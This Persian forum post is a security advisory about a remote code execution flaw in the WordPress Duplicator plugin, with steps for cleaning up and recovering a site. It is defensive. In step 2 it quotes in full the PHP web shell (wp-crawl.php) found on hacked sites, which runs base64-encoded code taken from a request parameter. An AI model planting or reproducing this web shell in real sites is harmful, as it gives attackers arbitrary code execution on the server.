خوش آمدید!

برای دریافت آخرین بروزرسانی‌های افزونه، استایل و ... نیازمند ثبت‌نام در انجمن می‌باشید تا با ما بروز بمانید!

ثبت نام!
آموزشهای وردپرس

WALKER

مدیر کل انجمن
تاریخ ثبت‌نام
11/13/18
نوشته‌ها
6,135
پسندها
5,547
امتیازها
113
محل سکونت
tehran
آنتی ویروس
812

در نسخه 1.2.42 و پایین تر افزونه Duplicator یک حفره امنیتی وجود دارد به نحوی که امکان اجرای کد بصورت ریموت را به هکرها می دهد (Remote Code Execution (RCE) ) ، هکر ها از این باگ امنیتی سطح بالا استفاده کرده و بصورت گسترده تعدادی زیادی از سایت های وردپرسی در سطح جهان را هک کرده اند.
توجه داشته باشید صرفا نصب افزونه Duplicator مشکلی امنیتی برای سایت ایجاد نمی کند اما بعد از استفاده از آن و ایجاد بسته نصبی، سایت در معرض هک شدن قرار می گیرد.
بعد از نصب قالب از طریق بسته نصبی فایل‌های database.php، installer.php، installer-backup.php، installer-log.txt و installer-data.sql و پوشه wp-snapshot نیز در کنار سایر فایل‌های پیشفرض وردپرس قرار می گیرند. در بسیاری موارد نیز کاربران فراموش می کنند فایل های نصبی افزونه داپلیکیتور را حذف کنند و مشکل دقیقا از همین جا شروع می شود، هکر می تواند با دسترسی به فایل نصبی اقدام به تغییرات گسترده در فایل wp-config.php و در نتیجه ریست کردن کامل اطلاعات درون این فایل کند و در اولین قدم سایت از دسترس خارج می شود.
برای رفع مشکل پیشنهاد می شود مراحل زیر را انجام دهید:

1. در اولین قدم فایل های زیر را از هاست حذف نمائید:
کد:
The ZIP archive (unique)
database.sql
installer-backup.php
installer-data.sql
installer-log.txt
installer.php
2. درصورتیکه در هاست شما و در پوشه public_html فایل wp-crawl.php
را مشاهده می کنید، سریعا آن را حذف نمائید. این فایل مخرب بوده و دسترسی لازم را به هکر می دهد تا دسترسی به هاست شما داشته باشد. نمونه کدی که در فایل ذکر شده مشاهده شده است بصورت زیر است:
کد:
<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');

3:غیر فعال کردن و یا حذف افزونه Duplicator از وردپرس، البته در صورتیکه افزونه Duplicator را به آخرین نسخه آپدیت و فایل نصبی را حذف نمائید خطری سایت شما را تهدید نمی کند.
4:برای در دسترس قرار دادن مجدد سایت نیز فایل خام wp-config.php را در هاست آپلود کرده ( می توانید جدیدترین نسخه وردپرس را از سایت رسمی آن دانلود و فایل فوق را از آن استخراج نمائید ) و اطلاعات دیتابیس را مجدد در درون آن قرار دهید تا سایت شما مجدد در دسترس قرار گیرد.

همواره می توانید با رعایت موارد امنیتی در سایت های وردپرسی تا حدی زیادی از هک و یا ویروسی شدن سایت جلوگیری کنید، پیشنهاد می شود موارد ذکر شده در لینک زیر را بصورت کامل در سایت وردپرسی خود انجام دهید :
 
ارسال کننده موضوعات مشابه انجمن پاسخ ها تاریخ
Sajadmsd مشکل ورود به آپلودسنتر اخبار انجمن ای فری 0
H مشکل در باکس دانلود وردپرس 10
M مشکل افزونه modern statics آموزشهای زنفورو 0
H مشکل ایندکس نشدن مطالب جدید وردپرس 8
H مشکل با افزونه افزونه Really Simple SSL pro وردپرس 2
ariamovie مباحث و مشکلات مشکل در ایجاد کردن پیشوند پشتیبانی زنفورو 1
soheilnew مباحث و مشکلات مشکل عکس با اپدیت 2.1.3 زنفورو پشتیبانی زنفورو 2
B مشکل در نصب ویندوز 10 سیستم عامل ویندوز 5
WALKER آموزش حل مشکل آپلود تصویر در وردپرس آموزشهای وردپرس 0
rayshman مشکل در پخش کننده قالب آمیتا قالب های وردپرس 28
WALKER آموزش حل مشکل کوکی در وردپرس (کوکی ها بخاطر خروجی غیر منتظره…) آموزشهای وردپرس 0
WALKER آموزش حل مشکل Fatal Error در وردپرس آموزشهای وردپرس 0
WALKER آموزش حل مشکل بازگشت وردپرس به صفحه نصب ۵ دقیقه‌ای آموزشهای وردپرس 0
WALKER آموزش مشکل در بروزرسانی وردپرس و روش‌های حل آن آموزشهای وردپرس 0
saman مشکل در نصب ویندوز سیستم عامل ویندوز 3
WALKER آموزش حل مشکل ثابت شدن تصاویر gif در وردپرس آموزشهای وردپرس 0
WALKER آموزش برطرف کردن مشکل url های فارسی آموزشهای وردپرس 0
WALKER آموزش رفع مشکل آپدیت وردپرس و پلاگین ها در هاست ایران آموزشهای وردپرس 0
WALKER آموزش مشکل صفحه سفید در وردپرس آموزشهای وردپرس 0
WALKER آموزش رفع مشکل وردپرس ، پس از تغییر دامنه آموزشهای وردپرس 0
WALKER آموزش آموزش رفع مشکل نصب افزونه و قالبهای وردپرس آموزشهای وردپرس 0
Magical دانلود Pzizz - Sleep, Nap, Focus Full 4.9.10 - نرم افزار حل مشکل بی خوابی و افزایش تمرکز برای اندروید + دیتابیس نرم افزارهای اندروید 0
Magical شیائومی Mi A2 مشکل کُندی حافظه دارد اخبار 0
E هک شدن واتس‌اَپ توسط هکرها مثل آب خوردن آموزش های نرم افزار و سخت افزار 0
Admin دانلود نسخه مود شده کالاف دیوتی موبایل + نسخه هک شده آفلاین بازی های اندروید 0
sslri آموزش بزرگترین پکیج هک سال 2019 + کتابهای پرداخت شده آموزش های پرمیوم 0
sslri آموزش پکیج هک پابجی موبایل برای اندروید آموزش های پرمیوم 1
A آموزش هک برنامه subcake اندروید با لاکی پچر آموزش ها 0
WALKER آموزش جلوگیری از هک شدن وردپرس با مخفی کردن نویسنده ها آموزشهای وردپرس 0
Admin معرفی ابزار Wireshark جهت هک وای فای مباحث و مشکلات شبکه 2
E مهارت های یاد گرفتنی برای تبدیل شدن به یک برنامه نویس اندروید آموزش های برنامه نویسی 1
J درخواست راهنمایی برای وارد شدن به تلگرام گفتگوی آزاد 1
J O K E R آموزش اضافه شدن یک سوم به اشتراک فیلیمو نرم افزارهای اندروید 0
J O K E R آموزش اضافه شدن یک سوم به اشتراک فیلیمو آموزش های پرمیوم 0
WALKER آموزش رفع خطای پنهان شدن دکمه های ویرایشگر متن در وردپرس آموزشهای وردپرس 0
J حذف شدن نیوفولدر در راست کلیک سیستم عامل ویندوز 1
WALKER آموزش غیر فعال شدن دکمه افزودن پرونده چند رسانه‌ای در وردپرس آموزشهای وردپرس 0

موضوعات مشابه

بالا